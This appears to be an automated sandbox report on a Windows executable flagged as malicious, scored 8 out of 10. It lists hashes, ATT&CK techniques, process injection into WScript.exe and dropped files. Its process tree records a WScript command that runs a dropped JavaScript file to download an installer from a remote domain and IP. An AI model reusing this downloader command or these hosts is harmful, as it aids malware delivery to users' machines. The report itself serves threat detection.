a5dade4a9b94004af266aec930505763a9c88151f4a46027a523ef903f30ef66

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe
Size

184KB
MD5

695862d1c7cd38822ac57d23475dd721
SHA1

30175cafaa735670fac74876c7305989810a7533
SHA256

a5dade4a9b94004af266aec930505763a9c88151f4a46027a523ef903f30ef66
SHA512

62c3ed226991acd6e16700bc453909968a02007c0585566be95bcd2fdb91d5bdeecb00ea860fb2d3e6d25d6d1c87534ea7371dd8029a9f062d2e555173181e28
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3K:/7BSH8zUB+nGESaaRvoB7FJNndnf

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	2012	WScript.exe
8	2012	WScript.exe
10	2012	WScript.exe
12	2628	WScript.exe
13	2628	WScript.exe
15	2872	WScript.exe
16	2872	WScript.exe
18	1000	WScript.exe
19	1000	WScript.exe
21	2148	WScript.exe
22	2148	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe

description	pid	process	target process
PID 2248 wrote to memory of 2012	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2012	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2012	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2012	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2628	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2628	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2628	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2628	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2872	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2872	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2872	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2872	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 1000	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 1000	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 1000	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 1000	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2148	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2148	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2148	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe
PID 2248 wrote to memory of 2148	2248	695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\695862d1c7cd38822ac57d23475dd721_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12D5.js" http://www.djapp.info/?domain=TAQuFnUCTH.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf12D5.exe
2⤵
- Blocklisted process makes network request
PID:2012

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12D5.js" http://www.djapp.info/?domain=TAQuFnUCTH.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf12D5.exe
2⤵
- Blocklisted process makes network request
PID:2628

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12D5.js" http://www.djapp.info/?domain=TAQuFnUCTH.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf12D5.exe
2⤵
- Blocklisted process makes network request
PID:2872

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12D5.js" http://www.djapp.info/?domain=TAQuFnUCTH.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf12D5.exe
2⤵
- Blocklisted process makes network request
PID:1000

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12D5.js" http://www.djapp.info/?domain=TAQuFnUCTH.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf12D5.exe
2⤵
- Blocklisted process makes network request
PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
64c143e9f2a438ddf74501d3b3cc54bf

SHA1
66b41aabcaa5c364d405c858b85fa7a995f53c72

SHA256
02802fa86c2539668fb375ddf8b3ffa5a6c7ad8ae0050c3471dc9fca1275c0ca

SHA512
9decfe443630833dfc6c4e2b728c0395d0cbd59a5d868639f300244c4c61df6540b21d33497a8dd4e1947aaef02e4cbc815f53acc21d70ba1653d9492f438e96

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
9aa57d6fae153f7489b475b1745c501d

SHA1
558b0c8449a1c22280edc1a1079b0089f9498fd5

SHA256
d04db05d97f93fe05896b8aa6f7d97499f363200a7080b58386e5de0e364f152

SHA512
96883a99273cc0ccc9eb1e1a1a508ca58498cdb8e720216301a391b3686073e227d550d54bbc1626e6b04d0a9998cc5f950c8c2f8b5129b609cd27cb6ed01228

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d5c554ab7b6164408f1dbc2e5b2fa52d

SHA1
5e3bd4ea0ceb0a3e2a85be42c48e0f997d985c3e

SHA256
d894513a076685fb8a7fd727e649d24887a763c7a42f3e96c0f9dd33f6538472

SHA512
f34de0df74ca41a13a3a852187d9a9ea1ce738492d0a733230dc15ce9637abd7088cf42b14f8e43b163ba0f9969e2c9b4bbae1bbe796f23329e90af5b8a4f6e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
afb0252ca87f2fe34716d3338930d3d1

SHA1
ac108852b9776144dde263fd4d3a5de64892fcd7

SHA256
c61b6748fbe4d64fa435262c74d79ae0839f1246c90e71683e7b5681a60b2e37

SHA512
2746bb41b4d69310c06fb333d264a772870e439f2cba784d8b05fd635c928c7abfc153a1a3f6007cf85ffb8e0090e4c12f970583ef9353227326265f9d365abd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

Filesize
40KB

MD5
d6263656790abcc69afad98dc28df929

SHA1
64e219e38a16f197f0b71caac9ff86d4142c8d84

SHA256
a47f25561176b21706c9ea5b404631646b551c7550c0a57fedb156c700d63735

SHA512
a9fb546929ce0a298cb76ca6c3b77c073dabcbc0f047befbcafd76e3e5cfcd484294e61232ead4f64b5dbe3fc34ec2bd1d9de97b60ab2d1760bedfd2749c659c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

Filesize
40KB

MD5
f14a84896128c0940b5bb935a097f8b9

SHA1
b65260836e5799a1cd819ced44bd9b2d08ca0433

SHA256
a2d0349911832a5c345ff44c8094254987a2e08d3f8a587c2d7c07878bf14b29

SHA512
0dbcc6245f94eda0b67591529231a14305e35378ea3ff9beb143168a7c18b515a3cffa8a52c970d66cb4ac08936176b751d7174d3f01ec14ad177ba2e37faa9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

Filesize
40KB

MD5
755784b609635a7df26bc97c69b31312

SHA1
4737743eb76815f9536b0825c948cbf55c843996

SHA256
6c126f2fd9edb87e971a75f1d485463916cfaebca710dbb2dfc68d1d4344bf29

SHA512
aa4ae7b305941e8f85893c9ca1cd09bed385286a1e66e1830e696ffafce931e228a20f4c65591e1192e249b900072217705c2fcd984cac5dc9679b1bd4ccda42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

Filesize
40KB

MD5
52597bc4b2328c3eb46f063739f4921d

SHA1
741b20a147716c2892a00c0db1ad0d26f9a38300

SHA256
49aeef07e65a5c856b2d319319061837f5b3629763d8c29725b2ba8a572531b1

SHA512
6029d76ef9dafffcb3eef0ada759ef60b0d83c1482fc2fc969e84dc3a79cd8537b69e85fbebf41ad4da03139fad8eef3af106cb43c66e5fc88ceffd77e9d2123

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

Filesize
40KB

MD5
776a3caa104ecd65eab23a01953da83e

SHA1
1d98a2f8b6d474a835fe4a4b7bf02465e989608e

SHA256
dcdc92901a30f6675b378708d9af1bc49178aded15b034038c10530b98af6ac9

SHA512
d7d654a5d021077970702b5e7e425b0e6677d59296c53bfcf68d596794067b8aca117aadf4251afebbc2062ad8edc6d4a79eef718d6bcd35e456f460075d0526

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab42EA.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5B2B.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf12D5.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JI8A6BPL.txt

Filesize
175B

MD5
1ebd3e465c1f3f8cb6d7bc385d000356

SHA1
65b619695f9b3c902dbdc0696b7ba21049e8a19e

SHA256
a34bca5864fc40436c6c0f77160a987bca178d4f93e8b630389397af4e1c6a14

SHA512
9c721110f9613df8b4fce91dedb9d353cc13353f376375f74d30d7e1d04e8bf16e1a511ecb97ae9358a6fb66e2780098829f74238e5ef4ff1ceb091928ee49f6

Download Submit